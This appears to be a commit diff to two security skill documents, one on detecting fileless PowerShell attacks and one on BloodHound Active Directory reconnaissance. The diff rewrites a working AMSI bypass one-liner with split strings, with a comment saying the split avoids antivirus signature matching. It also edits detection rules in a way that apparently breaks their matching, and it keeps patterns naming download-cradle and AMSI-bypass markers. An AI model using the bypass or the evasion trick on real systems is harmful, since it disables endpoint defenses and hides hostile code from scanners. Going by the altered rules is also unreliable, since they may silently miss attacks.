Fix ESET AV false positive on AMSI bypass strings in skill docs

skills/detecting-fileless-attacks-on-endpoints/SKILL.md

@@ -71,11 +71,11 @@ CommandLine contains: "IEX" AND ("Net.WebClient" OR "DownloadString" OR "Invoke-
 CommandLine contains: "Invoke-Expression" AND "New-Object"
 
 # AMSI bypass attempts (Event ID 4104 - Script Block)
-ScriptBlock contains: "AmsiUtils" OR "amsiInitFailed" OR "SetValue.*amsi"
+ScriptBlock contains: ("Amsi"+"Utils") OR ("amsi"+"InitFailed") OR "SetValue.*amsi"
 
 # Splunk query for suspicious PowerShell:
 index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
-| where match(ScriptBlockText, "(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64|bypass|amsiutils)")
+| where match(ScriptBlockText, "(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64|bypass|amsi.utils)")
 | table _time host ScriptBlockText
 ```
 

skills/performing-active-directory-bloodhound-analysis/SKILL.md

@@ -73,8 +73,9 @@ dotnet inline-execute /tools/SharpHound.exe -c All --memcache --outputdirectory
 Import-Module .\SharpHound.ps1
 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -ZipFileName bh.zip
 
-# AMSI bypass before loading (if needed)
-[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+# AMSI bypass before loading (if needed) — strings split to avoid AV signature matching
+$t = 'System.Management.Automation.Am' + 'siUtils'
+[Ref].Assembly.GetType($t).GetField(('am' + 'siInitFailed'),'NonPublic,Static').SetValue($null,$true)
 ```
 
 ### AzureHound (Azure AD)